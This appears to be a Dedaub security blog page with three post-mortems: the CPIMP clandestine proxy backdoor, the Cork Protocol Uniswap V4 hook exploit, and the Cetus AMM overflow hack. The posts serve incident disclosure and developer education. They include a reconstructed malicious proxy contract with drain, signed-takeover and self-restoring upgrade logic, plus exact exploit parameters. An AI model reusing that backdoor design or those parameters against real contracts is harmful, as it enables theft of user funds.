Category: Tech Deep Dive

Dive into the Dedaub blog for expert insights on smart contract security and blockchain innovation. Explore the latest advancements in the Ethereum ecosystem, including program analysis and DeFi exploits, through concise, expert-driven content designed for developers and blockchain enthusiasts.

  • The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    [by the Dedaub team]

    A major attack on several prominent DeFi protocols over many blockchains was (largely) successfully mitigated last week. The threat was potentially affecting (at a minimum) tens of millions of overall value, and yet the attacker was waiting for even more before making their move!

    The most technically-interesting aspects of the threat don’t have to do with the infection method, but with the attack’s clandestine nature: the attack contracts had been hiding in plain sight for weeks, infiltrating (in custom ways!) multiple protocols, while making sure that they remain entirely transparent to both regular protocol execution and to contract browsing on etherscan.

    We dub the attack vector CPIMP, for “Clandestine Proxy In the Middle of Proxy”, to capture its essence memorably.

    The Contact

    David Benchimol from Venn is no stranger. A few times before, he had brought to our attention potential attack vectors and we had long exchanges on determining feasibility and impact, with the help of our tools.

    In the afternoon of July 8, he made sure to put us on high alert, in a hurry!

    David was investigating a red flag raised by his colleague Ruslan Kasheparov. They had found several proxy initializations that had been apparently front-run, to insert malicious implementations.

    Nothing new here, right? Any uninitialized proxy contract can be taken over by the first caller of the initialization function.

    The difference in the case of the Clandestine Proxy In the Middle of Proxy (CPIMP) is that:

    • the CPIMP keeps track of the original intended implementation
    • the (legitimate owner’s) initialization transaction goes through, without reverting
    • the CPIMP stays in hiding, trying to be entirely transparent to the operation of the protocol: most normal calls propagate to the original implementation and execute correctly
    • at the end of every transaction, the CPIMP restores itself in the implementation slot of the proxy, so it is not removable by any usual or custom upgrade procedure
    • the CPIMP installation is done in such a way that it spoofs events and storage slot contents so that the most popular blockchain explorer, etherscan, reports the legitimate implementation, and not the CPIMP, as the implementation of the proxy.

    (In the future, etherscan will be updated to report the CPIMP correctly — more on that later.)

    So the CPIMP is truly a clandestine proxy in the middle!

    An example front-running initialization transaction is shown below.

    This is, of course, code controlled by the attacker. But note the two telltale Upgraded events.

    After this point, the victim proxy points to a malicious CPIMP as its implementation. Yet transactions proceed as normal. A careful observer can see the presence of the CPIMP in any transaction explorer:

    Note that dispatching the call required two delegatecall instructions, not just one! Instead of delegating from the proxy to the legitimate implementation, the execution delegates first to the CPIMP, who then delegates to the legitimate implementation.

    The attacker is simply lying in hiding, maybe waiting for bigger fish before they reveal their presence?

    The Impact

    At the time of contacting us, David already knew that this was not an isolated incident but one affecting tens of contracts. What none of us knew, however, was the extent of the threat.

    Drafting the right query on our DB to determine all affected contracts was not a trivial task. A reasonable first version looked like this:

    (If you run this query, be sure to set the Duration to more than the default “last 24 hrs”.)

    In the next hours, the query improved a lot, to capture all threatened contracts, over multiple networks, with very few false positives. But even early on, a clear picture emerged: there were many protocols at risk, and triaging the threat fully would take weeks, if not months!

    The contracts that had been taken over by CPIMPs belonged (in different chains) to projects like EtherFi, Pendle, Bera, Orderly Network, Origin, KIP Protocol, Myx, and several more tokens, protocols, oracles, etc. Not all of these were equally vulnerable. In many cases the threat was low. E.g., Pendle had successfully migrated from the infected contracts three weeks ago and confirmed that they are not vulnerable (although they lost some small amounts in the process because of anti-recovery mechanisms that the CPIMP employed).

    But with several tens of contracts already infected, and many of them appearing to have significant privileges, we had to act, even before fully determining the extent of the threat.

    The War Room

    SEAL 911 and its fearless leader @pcaversaccio are the absolute best to run any war room, and even more so for a war room over a broad, multi-protocol vulnerability!

    For the next 36 hours, we alternated frantically between triaging the threat over infected contracts and seeking contacts from all affected protocols that we could identify.

    The main problem was that mitigation could not be atomic and any “fix” for one protocol ran a grave risk of notifying the attacker that they have been discovered. This might cause imminent attacks on other protocols, possibly before we were even aware of the extent of the threat over these protocols. The attacker had months to prepare and estimate what they can steal, we only had hours!

    And triaging such a vulnerability is far from easy. Take the case of the Orderly Network CrossChainManager on BNB Chain. The contract can clearly perform actions (e.g., deposit) that will be accepted cross-chain, via Layer Zero. But how serious is the threat? Are there timelocks on the other end? Is there some off-chain alerting that will trigger and can help mitigate an attack? Without inspecting large amounts of code, one could not be sure of the severity of a potential attack.

    With all this in mind, the hours that followed saw the bringing into the war room security contacts for all affected protocols that we could find. SEAL’s @pcaversaccio ran the show and coordinated the rescues in a way that minimal information would be leaked. Every solution needed to be custom: in many cases, protocols had to work with a CPIMP that had to be fooled into approving their rescue transactions. Also, most rescues had to run at approximately the same time, before the attacker could react.

    The end result was not perfect, but it was very successful for such a broad vulnerability. The attack is still ongoing, with the attacker still trying to profit from victim contracts that remain vulnerable. However, the overwhelmingly largest part of the threat has been mitigated.

    David’s tweet is the best starting point for following the reactions and aftermath.

    Individual protocols have since published [their] [own] [disclosures].

    Dissecting the CPIMP: a Backdoor Powerhouse

    The true sophistication of the CPIMP emerges in inspecting its decompiled code, which we’ve analyzed across multiple variants. This reveals a highly-engineered contract designed for persistent dominance, flexibility, evading detection, and enabling targeted asset exfiltration. Below is a simplified summarized decompilation of an Ethereum variant, highlighting buried mechanisms like signature-triggered executions, granular routing, and shadow storage controls:

    // Manually reverse-engineered decompiled excerpt from malicious proxy (based 
    // on bytecode analysis)
    contract MaliciousProxy {
      address private immutable backdoor =
        0xa72df45a431b12ef4e37493d2bcf3d19af3d24fa;
      address private owner;  // Shadow owners possible via multiple slots
      address private _implementation;
      address private _admin;
      mapping(bytes4 => uint8) private selectorModes;  
        // 0=normal, 1=blocked, 2=permissioned
      mapping(bytes4 => address) private selectorToImpl;
      mapping(bytes4 => mapping(address => address)) private perCallerRouting;
      mapping(bytes4 => mapping(address => bool)) private permissions;
      mapping(bytes4 => bool) private silentFlags;  // Suppress events/logs
      mapping(address => bool) private whitelists;
      uint256 private nonce;  // Anti-replay in signatures
    
      modifier backdoorOrOwner() {
        if (msg.sender != backdoor && msg.sender != owner) 
          revert("Unauthorized");
          _;
      }
    
      // ?
     
      function drainAssets(address[] calldata tokens) external backdoorOrOwner {
        // Bulk drain tokens, with special handling of ETH
      }
    
      function signedTakeover(bytes calldata data, uint8 v, bytes32 r, 
                              bytes32 s) external {
        // Off-chain triggered via ecrecover
        bytes32 hash = keccak256(abi.encodePacked(
                          "\x19Ethereum Signed Message:\n", data.length, data));
        address signer = ecrecover(hash, v, r, s);
        require(signer == backdoor, "Invalid sig");
        this.delegatecall(data);  // Execute arbitrary payload
      }
    
      function updateRouting(bytes4[] calldata selectors, 
                             address[] calldata impls, 
                             uint8[] calldata modes) external backdoorOrOwner {
        // Granular routing updates
        for (uint i = 0; i < selectors.length; i++) {
          selectorToImpl[selectors[i]] = impls[i];
          selectorModes[selectors[i]] = modes[i];
        }
      }
    
      // Complex Routing logic 
      function getImplementation(bytes4 selector) private returns (address) {
        if (perSelectorRouting[selector][_implementation] != address(0)) {
          return perSelectorRouting[selector][_implementation];
        } else if (perSelectorRouting[selector][address(0)] != address(0)) {
          return perSelectorRouting[selector][address(0)];
        } else {
          return _implementation;
        }
      }
    
      // code to restore CPIMP in implementation slot(s)
      function postDelegateReset() private {
        // Slot integrity check/reset (prevents upgrades)
        if (STORAGE[keccak256("eip1967.proxy.implementation") - 1] != 
            _implementation) {
          STORAGE[keccak256("eip1967.proxy.implementation") - 1] =
            _implementation;
        }
        if (_admin != expectedAdmin) {  // Similarly for admin/beacon slots
          _admin = expectedAdmin;
        }
        // Additional resets for owners, nonces if altered during call
      }
    
      // Fallback delegates to routed implementation
      fallback() {
        address impl = getImplementation(msg.sig);
        (bool success, bytes memory ret) = impl.delegatecall(msg.data);
        require(success);
        postDelegateReset(); 
        assembly { return(add(ret, 0x20), mload(ret)) }
      }
    
      // Additional: Direct storage writes, nonce for replays, etc.
      function updateManyStorageSlots(uint[] index, bytes32[] value) 
       external backdoorOrOwner {
         // Updates multiple storage slots simultaneously
      }
    }

    Although the reverse-engineering above is incomplete, several important elements are clear. The CPIMP extends far beyond a simple relay, embedding a suite of controls for hijacking, persistence, and evasion:

    • Backdoor Authorization with Shadows: The hardcoded backdoor (0xa72df45a…) as an immutable variable overrides ownership for upgrades, drains, and executions, acting as a super-admin. Multiple “owner” slots (e.g., shadow admins) allow stealthy swaps, while the functionality enables unrestricted calls/delegatecalls.
    • Granular Function-Level Routing and Modes: Selectors map to custom implementations or per-caller targets, supporting partial hijacks (e.g., only divert transfers). Enum modes (normal/blocked/permissioned) add flexibility, with whitelists exempting users—ideal for selective attacks without alerting everyone.
    • Protocol-specific logic: The advanced routing mechanism enabled protocol-specific logic to be overridden, without triggering an upgrade to the malicious proxy. We’ve seen multiple instances of specific logic that was added by the attacker to thwart recovery. CPIMPs were sometimes nested, with one pointing to another.
    • Anti-recovery: some of the sub-proxies that are routed into have hard-coded checks in them to make sure that the balance does not dip by a specific amount in a single transaction (e.g., >90% transfers revert). In order to evade detection (calling a public function on itself that appears in a potential call trace), the attacker reads the storage slots directly. This prevented large rescues (e.g., >90% of balances), something that Pendle had to face in their recovery.
    • Restoring the CPIMP if removed: after delegating to the original implementation, the CPIMP restores itself in the implementation slot, to prevent upgrades that remove it.
    • Advanced Anti-Detection: Silent upgrades (which selectively emit an upgraded flag based on some preconditions).
    • Batch ETH and Token Draining: Fallback is payable, allowing ETH to accumulate. There is also bulk draining support, so arrays of tokens/ETH, including approvals and transfers to the backdoor can be done. 
    • Silent Attacks: Signed executions allow executions to take place on L2s, even if the admin/superadmin is blacklisted! Batch operations and direct storage writes (arbitrary slot sets) facilitate complex chains of operations that are needed to be performed to attack specific protocols.
    • Persistence and Automation Hooks: Counters/nonces track deployments, so that attacker does not mess up the proxy.

    The attacker’s investment shines through: This isn’t opportunistic — it’s a framework for automated, resilient campaigns to be triggered when the time comes.

    The Sneakiness

    What is perhaps most striking about the CPIMP attack is the sneakiness. The attacker was waiting for even bigger fish and has customized their different CPIMPs for different victims. The extent of manual effort per CPIMP infection seems substantial.

    Perhaps the most interesting of these measures has been the attacker’s attention to not being detectable by etherscan’s “read/write as proxy” feature. If one visits a victim contract’s page, etherscan does not report the CPIMP as the implementation, but instead lists the legitimate implementation contract.

    This is not too surprising, right? All that the attacker needs it to emit fake events, and the service will be fooled.

    Well … no!

    Etherscan implementation detection is more sophisticated than that and the attacker has spent significant effort circumventing it. Specifically, etherscan is consulting the value of storage slots in the proxy contract, in order to determine what is the implementation. Since there is no single standard for where a proxy stores the address of its implementation, however, each proxy type has its own. In this case, the proxies infected are EIP-1967 proxies. However, the attacker inserted the wrong implementation address in a slot used by an older OpenZeppelin proxy standard, fooling etherscan into reporting that slot’s contents as the implementation!

    The SEAL 911 war room brought in etherscan security contacts, in addition to the victim protocols. As a result, etherscan has quickly marked all contracts that our investigation identified, and is planning to fix the bug that led to the misleading implementation report.

    Parting Words

    Investigating and mitigating the CPIMP attack vector was a very interesting experience: this was an extensive, highly-sophisticated man-in-the-middle-style hijacking that had already infected many well-known protocols on several chains (ethereum, binance, arbitrum, base, bera, scroll, sonic).

    The adrenaline rush from the investigation was incredible and it’s rewarding that most potential loss has been prevented, via a well-coordinated effort. David put it best, so we’ll close with his message:

  • The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    On 28th of May 2025, Cork Protocol suffered an $11M exploit due multiple security weaknesses, culminating in a critical access control vulnerability in their Uniswap V4 hook implementation. The attacker exploited missing validation in the hook’s callback functions fooling the protocol into thinking that valuable tokens (Redemption Assets) were deposited by the attacker, thus crediting the attacker with a number of derivative tokens that could be exchanged back to other valuable tokens. The attacker also exploited a risk premium calculation, which compounded the attack. Among other things, this incident highlights the importance of proper access control in Uniswap V4 hooks and the risks of highly flexible open designs, which are very hard to secure.

    Background

    Understanding Cork Protocol

    Cork Protocol is a depeg insurance platform built on Uniswap V4 that allows users to hedge against stablecoin or liquid staking token depegs. The protocol operates with four token types per market:

    • RA (Redemption Asset): The “original” asset (e.g., wstETH)
    • PA (Pegged Asset): The “riskier” pegged asset (e.g., weETH)
    • DS (Depeg Swap): Insurance token that pays out if PA depegs from RA
    • CT (Cover Token): The counter-position that earns yield but loses value if depeg occurs

    Another way to think of the DS is a put option at a fixed strike price denominated in RA, while CT is the corresponding short put.

    Users can mint DS + CT by depositing RA, effectively splitting the redemption asset into two complementary positions. A legitimate transaction demonstrating this in action can be found here.

    Unlike modern options protocols such as Opyn, the DS is fully collateralized with RA, which simplifies trust assumptions.

    Understanding Uniswap V4

    Uniswap V4 represents a significant architectural shift, moving to a central PoolManager (Singleton pattern) and introducing ‘hooks’ – external contracts that the PoolManager calls at various points in a pool’s lifecycle (e.g., before or after swaps, liquidity changes). This design, as highlighted by security experts like Damien Rusinek, offers immense flexibility and customization but, as the Cork Protocol incident demonstrates, also introduces new, critical security considerations for developers.

    Vulnerability 1: Missing Access Control

    An important vulnerability in the CorkHook contract was a critical oversight directly echoing a common pitfall warned about by many security researchers. Cork’s Uniswap hooks were called by the attacker’s smart contract directly, mid-transaction. Let’s examine the vulnerable beforeSwap function:

    function beforeSwap(
    	address sender,
    	PoolKey calldata key,
    	IPoolManager.SwapParams calldata params,
    	bytes calldata hookData
    ) external override returns (bytes4, BeforeSwapDelta delta, uint24) {
    	PoolState storage self = pool[toAmmId(Currency.unwrap(key.currency0), Currency.unwrap(key.currency1))];
    	// kinda packed, avoid stack too deep 
    	delta = toBeforeSwapDelta(-int128(params.amountSpecified), int128(_beforeSwap(self, params, hookData, sender)));
    	// TODO: do we really need to specify the fee here?
    	return (this.beforeSwap.selector, delta, 0);
    }

    Critical Issue: This function lacks an onlyPoolManager modifier (allowing only calls from a trusted Uniswap v4 manager), meaning anyone can call it directly with arbitrary parameters. While the contract inherits from BaseHook, which provides access control for unlockCallback, it fails to protect other hook callbacks.

    // BaseHook provides this for unlockCallback: 
    modifier onlyPoolManager() {
    	require(msg.sender == address(poolManager), "Caller not pool manager"); _;
    }

    Vulnerability 2: Risk premium calculation rollover

    Risk premium, which affects the price of derivative (CT) tokens had an extreme value when close to expiry. The exploiter acquired a small amount of DS tokens close to the expiry, manipulating the price ratio of CT to RA tokens. On rollover (for a new expiry period), this skewed ratio was used to compute how many tokens of CT and RA to deposit to the AMM. With a skewed ratio of CT to RA tokens deposited, the exploiter could convert a very small amount of 0.0000029 wstETH to 3760.8813 weETH-CT.


    The Attack

    Cork Protocol allowed DS (Insurance) tokens from one market to be used as RA (Safe assets) tokens in another market. This was likely not an intentional design choice, and the protocol authors probably didn’t think of this possibility. An unintentional consequence of this is that relatively valuable tokens (DS tokens) from a good market can potentially be accessed from another market if there’s a vulnerability.

    This relatively obscure security weakness compounded the exploit perpetrated by this attacker in a very complex, multi-step attack.

    STEP 1: CROSS-MARKET TOKEN CONFUSION

    The attacker created a new market configuration that used one of the DS token in another market as an RA token in the new market.

    // Legitimate market
    Legit Market: {
    	RA: wstETH,
    	PA: weETH,
    	DS: weETH-DS,
    	CT: weETH-CT
    }
    
    // Attacker's new market 
    New Market: { 
    	RA: weETH-DS, // Using DS token as RA!
    	PA: wstETH,
    	DS: new_ds,
    	CT: new_ct
    }

    Step 2: Malicious Hook Contract

    The attacker deployed their own contract implementing the hook interface and rate provider interface. The custom rate provider appears to be a red herring in this attack – it simply returns a fixed rate.

    The new market utilized a fresh Uniswap v4 pool created as part of the new market. The attacker also created (in a separate transaction) a Uniswap pool with the same tokens as a the newly created pool (trading new_CT and weETH-DS) but with the hacker’s contract as the hook!

    Step 3: Direct Hook Manipulation

    This is where the action takes place. Due to the missing access control, the attacker could directly call beforeSwap to fool the protocol:

    This pool id of the maliciously-created pool was passed into the beforeSwap callback. The hook data supplied as part of the callback directed the protocol to an execution flow by which RAs are deposited and CT and DS tokens are returned. However, in such a transaction no RAs were deposited by the attacker. Instead an amount of roughly 3761 weETH-DS were credited towards the attacker. The carefully crafted hook data payload fooled Cork protocol into thinking that the attacker had deposited 3761 weETH-DS. By doing so the attacker illegitimately gains 3761 new_ct and 3761 new_ds tokens.

    Step 4: DS Token Extraction

    Once the attacker has gained the new_ct and new_ds tokens, the attacker used these to redeem weETH-DS tokens.

    Step 5: wstETH Token Extraction

    Note that in a previous step the attacker has also exploited another edge case to cheaply acquire weETH-CT tokens. Since writing this article, a clearer explanation was posted by the Cork protocol team about the miscalculations involved, however the essence is that the exploiter acquired a small amount of DS tokens close to the expiry, manipulating the price ratio of CT to RA tokens in the next expiry period. With this manipulation, the exploiter could convert 0.0000029 wstETH (a very small amount) to 3760.8813 weETH-CT.

    Now, all that remains to be done by the attacker is to redeem these weETH-CT and weETH-DS tokens through the protocol, as intended, to withdraw $11m of wstETH.

    Technical Deep Dive: Hook Manipulation

    The _beforeSwap function contains complex logic for handling swaps, including reserve updates and fee calculations:

    function _beforeSwap(
      PoolState storage self,
      IPoolManager.SwapParams calldata params,
      bytes calldata hookData,
      address sender
    ) internal returns (int256 unspecificiedAmount) {
        // ... swap calculations ...
        // Update reserves without validation
        self.updateReservesAsNative(Currency.unwrap(output), amountOut, true);
        // Settle tokens
        settleNormalized(output, poolManager, address(this), amountOut, true);
        // ... more logic ...
    }

    Without access control, an attacker can:

    • Manipulate reserve ratios before legitimate trades
    • Force the hook to settle tokens with arbitrary amounts
    • Bypass normal swap routing through the PoolManager

    Parsing the arguments used in hookData, the attacker crafted a payload intended to indicating that they deposited 3761 of weETH-DS tokens into the new market.

    Contributing Factors

    1. Decentralized Market Creation

    The protocol allowed anyone to create markets with any token pair. This is a courageous design decision, however it’s clearly hard to pull off correctly.

    function beforeInitialize(address, PoolKey calldata key, uint160) external ... {
        address token0 = Currency.unwrap(key.currency0);
        address token1 = Currency.unwrap(key.currency1);
        
        // Dedaub: No validation on token types!
        // Allows DS tokens to be used as RA tokens
    
    }

    2. Insufficient Token Validation

    The _saveIssuedAndMaturationTime function attempts to validate tokens but fails to ensure proper token types:

    function _saveIssuedAndMaturationTime(PoolState storage self) internal {
        IExpiry token0 = IExpiry(self.token0);
        IExpiry token1 = IExpiry(self.token1);
        // Dedaub: Only checks if tokens have expiry, not their type
        try token0.issuedAt() returns (uint256 issuedAt0) {
            self.startTimestamp = issuedAt0;
            self.endTimestamp = token0.expiry();
            return;
        } catch {}
        // ... similar for token1 ...
    }

    3. No Pool Whitelisting

    The callback allowed pools that had the same tokens, but a different hook contract. There was no validation on the pool id nor the hook contract address.

    mapping(PoolId => bool) public allowedPools;
    
    modifier onlyAllowedPool(PoolKey calldata key) {
        require(allowedPools[key.toId()], "Pool not allowed");
        _;
    }

    4. Singleton Design

    Tokens from the different markets co-mingled (Singleton pattern). Therefore, a vulnerability that was applied to the new market managed to extract tokens pertaining to another market.

    Previous Cork Protocol Audits

    Unfortunately, although the Cork protocol had undergone security reviews by four different audit providers, this incident still happened. The protocol team had clearly invested resources in security, making this exploit all the more tragic for both the team and users.

    However, among the four auditors, three of them didn’t audit the vulnerable hook contracts, and it is uncertain whether the risk premium issue could have been easily found just by looking at the code. It is likely that Cantina/Spearbit had the vulnerable CorkHook contract within their audit scope. A pull request with recommendations shows they did identify some issues and suggested improvements.

    Runtime Verification (another auditor who did not have CorkHook in their scope) presciently noted in their report:

    “An interesting follow-up engagement would be to prove the invariants for the CorkHook functions that are being invoked by different components verified within the scope of this engagement, as well as the functions of other contracts, such as CorkHook, Liquidator and HedgeUnit.”

    This observation now seems particularly prophetic, as it was precisely the CorkHook’s interaction with other components that enabled the exploit.

    Recommendations for Hook Developers

    If you’re building a project that interacts with Uniswap v4 Hooks in a meaningul way, get your code audited by experts in the area. Dedaub is Uniswap-whitelisted audit provider, with plenty of experience securing high-stakes projects. Since Dedaub is whitelisted by Uniswap, the audit can also be paid for via a Uniswap Foundation grant. In the meantime, follow the guidelines below. We also recommend listening to Damien Rusinek’s talk.

    Master Access Control and Permissions

    Strict PoolManager-Only Access: This is non-negotiable. Every external hook function that can modify state or is intended to be called by the PoolManager (e.g., beforeSwap, afterSwap, beforeInitialize) must implement robust access control, typically an onlyPoolManager modifier. This was a primary failing in the Cork exploit. As Damien and Hacken emphasize, allowing direct calls by arbitrary addresses is a direct path to state manipulation and fund loss. Cork didn’t follow this recommendation.

    Correct Hook Address Configuration: Uniswap V4 derives hook permissions (which functions the PoolManager will call) directly from the hook contract’s address.

    Address Mining: Deploy hooks using CREATE2 with a salt that ensures the deployed address correctly encodes all intended permissions (e.g., Hooks.BEFORE_SWAP_FLAG | Hooks.AFTER_SWAP_FLAG). Cork didn’t follow this recommendation.

    Mismatch Avoidance: A mismatch between the functions implemented in your hook and the permissions encoded in its address will lead to functions not being called or PoolManager attempting to call non-existent functions, causing reverts (DoS).

    Future-Proofing Upgrades: If you plan to add new hookable functions in future upgrades (for UUPS-style proxies), ensure the initial deployment address already encodes these future permissions. Alternatively, include placeholder functions for them.

    Inherit from BaseHook: Whenever possible, inherit from Uniswap’s BaseHook contract. It provides foundational security checks (like onlyPoolManager for unlockCallback) and helps ensure correct interface adherence, reducing the risk of configuration errors.

    Rigorous State Management and Pool Interaction

    Restrict Pools. If a hook is designed for a specific pool or set of pools, it must validate the PoolKey in its functions (especially initialization) to prevent unauthorized pools from using it. Consider implementing an allowedPools mapping and a modifier like onlyAllowedPool. Ensure the hook can only be initialized once (e.g., in beforeInitialize) to restrict it to a single pool if that’s the design. Cork didn’t follow this recommendation.

    Isolate State for Reusable Hooks: If a hook is intended to be shared across multiple legitimate pools, its internal state must be meticulously segregated (e.g., using mapping(PoolId => PoolSpecificData)). Failure to do so can lead to one pool’s activity corrupting another’s state, potentially locking funds or creating exploitable conditions.

    Prevent Cross-Market Token Contamination: As seen in the Cork exploit, avoid designs where tokens (especially sensitive ones like derivatives or collateral) from one market can be misinterpreted or misused as different token types in another market. Enforce strict token type validation at market creation and within hook logic.

    Understand sender vs. msg.sender vs. Transaction Originator. In hook functions like beforeSwap(address sender, ...) the sender parameter is typically the PoolOperator or the PoolManager itself, not the end-user (EOA) who initiated the transaction. If your hook logic needs the actual end-user, that address must be securely passed via the hookData parameter by a trusted PoolOperator.

    Understand Delta Accounting. BeforeSwapDelta and BalanceDelta are from the hook’s perspective. If the hook takes a fee, it must be a negative delta. If it grants a rebate, it’s a positive delta. Ensure the correct order of token deltas (e.g., specified vs. unspecified, or token0 vs. token1) based on the swap direction (params.zeroForOne). Crucially, all deltas must net to zero by the end of the unlockCallback. The PoolManager tracks this with NonzeroDeltaCount. Unsettled balances will cause the transaction to revert. Hooks modifying balances must ensure they (or the user) settle these amounts correctly (e.g., via settle() or take()).

    Upgradability: If your hook is upgradeable, recognize this as a significant trust assumption. A malicious or compromised owner can change the hook’s logic entirely. Ensure the upgrade mechanism is secure and governed transparently.

    Conclusion

    The Cork Protocol hack demonstrates that Uniswap V4 hooks, while powerful, introduce new security considerations that developers must carefully address. The combination of missing access controls and insufficient token validation created a perfect storm for exploitation. As the DeFi ecosystem continues to evolve with more composable protocols, developers must prioritize security at every layer of their architecture.

  • The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    On May 22, 2025, the Cetus AMM on the Sui Network suffered a devastating hack resulting in over $200 million in losses. This incident represents one of the most significant DeFi exploits in recent history, caused by a subtle but critical flaw in “overflow” protection. This analysis dissects the technical details of the exploit and examines when this issue was introduced, fixed, and re-introduced.

    Executive Summary

    The attacker exploited a vulnerability that truncates the most significant bits in a liquidity calculation function of Cetus AMM. This calculation is invoked when a user opens an LP position. When opening such position, a user can open a large or small position by specifying a “liquidity” parameter (what fraction of the pool you would like to get in return), and supplying the corresponding amount of tokens. By manipulating the liquidity parameter to an extremely high value, they caused an overflow in the intermediate calculations that went undetected due to a flawed truncation check. This allowed them to add massive liquidity positions with just 1 unit of token input, subsequently draining pools collectively containing hundreds of millions of dollars worth of token.

    Note: the technical term for the issue is not “overflow”, but an MSB (most significant bits) truncation, but let’s call it “overflow” for simplicity.

    The Attack Sequence

    The attack unfolded in a carefully orchestrated sequence. Here’s an example of one such attack transaction (simplified):

    1. Flash Swap Initiation: The attacker borrowed 10 million haSUI through a flash swap with maximum slippage tolerance
    2. Position Creation: Opened a new liquidity position with tick range [300000, 300200] – an extremely narrow range at the upper bounds
    3. Liquidity Addition: Added liquidity with just 1 unit of token A, but received a massive liquidity value of 10,365,647,984,364,446,732,462,244,378,333,008. This action succeeded due to an undetected bitwise truncation.
    4. Liquidity Removal: Immediately removed the liquidity in multiple transactions, draining the pool
    5. Flash Loan Repayment: Repaid the flash swap and kept approximately 5.7 million SUI as profit

    Technical Deep Dive: The “Overflow” Vulnerability

    The root cause lies in the get_delta_a function within clmm_math.move, which calculates the amount of token A required for a given liquidity amount:

    public fun get_delta_a(
        sqrt_price_0: u128,
        sqrt_price_1: u128,
        liquidity: u128,
        round_up: bool
    ): u64 {
        let sqrt_price_diff = sqrt_price_1 - sqrt_price_0;
        
        let (numberator, overflowing) = math_u256::checked_shlw(
            // Dedaub: result doesn't fit in 192 bits
            full_math_u128::full_mul(liquidity, sqrt_price_diff)
        );
        // Dedaub: checked_shlw "overflows" result, since it << 64
        assert!(overflowing);
        
        let denominator = full_math_u128::full_mul(sqrt_price_0, sqrt_price_1);
        let quotient = math_u256::div_round(numberator, denominator, round_up);
        (quotient as u64)
    }

    The Mathematical Breakdown

    Using the actual values from the transaction:

    • liquidity: 10,365,647,984,364,446,732,462,244,378,333,008 (approximately 2^113)
    • sqrt_price_0: 60,257,519,765,924,248,467,716,150 (tick 300000)
    • sqrt_price_1: 60,863,087,478,126,617,965,993,239 (tick 300200)
    • sqrt_price_diff: 605,567,712,202,369,498,277,089 (approximately 2^79)

    The critical calculation:

    numerator = checked_shlw(liquidity * sqrt_price_diff)
              = checked_shlw(~2^113 * ~2^79)
              = checked_shlw(2^192 + ε)
              // checked_shlw shifts a 256-bit register by 64
              = ((2^192 + ε) * 2^64) mod 2^256
              = ε
    
    

    This multiplication produces a result exceeding 192 bits. When this value is left-shifted by 64 bits in checked_shlw (i.e., “checked shift left by one 64-bit word”) it overflows a 256-bit integer, but an overflow check designed for this check fails.

    But wait. Isn’t a checked operation supposed to prevent this issue?

    The Flawed Overflow Check

    The critical flaw lies in the checked_shlw function:

    public fun checked_shlw(n: u256): (u256, bool) {
        let mask = 0xffffffffffffffff << 192;  // This is incorrect!
        if (n > mask) {
            (0, true)
        } else {
            ((n << 64), false) // exact location of overflow
        }
    }

    The mask calculation 0xffffffffffffffff << 192 doesn’t produce the intended result. The developers likely intended to check if n >= (1 << 192), but the actual mask doesn’t serve this purpose. As a result, most values greater than 2^192 pass through undetected, and the subsequent left shift by 64 bits causes a silent overflow in Move (which doesn’t trigger runtime errors for shift operations).

    Integer Considerations

    In Move, the security around integer operations is designed to prevent overflow and underflow which can cause unexpected behavior or vulnerabilities. Specifically:

    • Additions (+) and multiplications (*) cause the program to abort if the result is too large for the integer type. An abort in this context means that the program will terminate immediately.
    • Subtractions (-) abort if the result is less than zero.
    • Division (/) abort if the divisor is zero.
    • Left Shift (<<), uniquely, does not abort in the event of an overflow. This means if the shifted bits exceed the storage capacity of the integer type, the program will not terminate, resulting in incorrect values or unpredictable behavior.

      It is normal for languages with checked arithmetic to not trigger errors when bit shifting truncates the result. Most smart contract auditors understand this.

    The Exploitation Impact

    Due to the overflow, the numerator wraps around to a very small value. When divided by the denominator, it produces a quotient close to 0. This means the function returns that only 1 unit of token A is required to mint the massive liquidity position.

    In mathematical terms:

    • Expected: very larger number of tokens required
    • Actual (due to overflow): 1 token required

    It is worth noting that the numeric values involved in the attack are precisely calculated – the attacker utilized some existing functions in the contract to compute these, notably get_liquidity_from_a.

    The Audit Trail: Similar Issue Found Before

    Ottersec’s audit identified an eerily similar overflow vulnerability in an earlier variant of the code (early 2023), specifically designed for Aptos:

    “The numberator value is not validated before running u256::shlw on it. As a result, the non-zero bytes might be removed, which leads to an incorrect calculation of the value.”

    They recommended replacing u256::shlw with u256::checked_shlw and adding overflow detection, which solved the issue. Note that this version of the code had custom implementations of 256-bit unsigned integer operations since Aptos didn’t support this naively at the time. Move 2 / Aptos CLI ≈ v1.10 rolled to mainnet early 2024.

    It is really unfortunate that when the team ported the code to SUI a couple of months later (Sui always supported 256-bit integers), a bug was introduced in checked_shlw. Audits to this version of the AMM by Ottersec and MoveBit do not find this issue. A subsequent audit by Zellic in April 2025 found no issues beyond informational findings. It is possible that library code performing numerical calculations were out of scope and moreover, since 256-bit operations are natively supported, issues like these could have been overlooked.

    Lessons for Developers

    1. Understand Your Language’s Integer Semantics

    • Know which operations abort and which silently overflow
    • Pay special attention to bit shift operations
    • Test your overflow checks with actual overflow conditions

    2. Mathematical Rigor is Non-Negotiable

    • DeFi protocols need to handle extreme values by design
    • The bounds of every mathematical operation need to be clearly understood
    • Consider using formal methods for verifying critical calculations (our team can assist)

    3. Test Edge Cases Exhaustively

    • Maximum values aren’t theoretical – they’re attack vectors
    • Combine multiple edge cases

    4. Audit Fixes, Not Just Changes

    • Consider independent verification of critical fixes

    5. Domain Expertise Matters

    • AMM mathematics involves complex invariants
    • Work with auditors who understand DeFi edge cases

    In DeFi, edge cases aren’t edge cases – they’re attack vectors. AMMs are particularly vulnerable as they involve complex mathematical operations across extreme ranges. The Cetus hack demonstrates that even “checked” operations require careful verification.

    Conclusion

    The Cetus hack serves as a stark reminder that security in DeFi is hard, but not impossible to achieve. A single flawed overflow check, combined with the composability of flash loans and concentrated liquidity mechanics, enabled the theft of over $200 million.

    For developers building on Move-based chains like Sui and Aptos, this incident underscores the importance of understanding your language’s integer semantics, rigorously testing edge cases, and working with auditors who deeply understand both the platform and the DeFi domain.

    Contact us at Dedaub if you need help securing your Aptos or Sui Network project – our team specializes in the mathematical complexities and edge cases that come up in complex DeFi protocols.

